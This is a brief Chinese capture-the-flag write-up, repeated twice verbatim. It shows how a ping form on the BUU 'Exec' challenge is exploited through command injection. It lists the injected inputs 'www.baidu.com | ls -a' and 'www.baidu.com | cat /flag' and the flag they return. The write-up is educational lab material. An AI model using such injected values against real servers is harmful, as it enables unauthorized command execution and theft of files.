BUU-WEB-Exec
页面功能只是常规的ping操作,查看源码未发现有什么过滤。
通过管道符进行多指令执行。
www.baidu.com | ls -a
通过管道符是可以执行指令的,所以直接尝试打开flag文件。
www.baidu.com | cat /flag
flag{418216f7-b172-4331-9927-52bc34a623e1}
页面功能只是常规的ping操作,查看源码未发现有什么过滤。
通过管道符进行多指令执行。
www.baidu.com | ls -a
通过管道符是可以执行指令的,所以直接尝试打开flag文件。
www.baidu.com | cat /flag
flag{418216f7-b172-4331-9927-52bc34a623e1}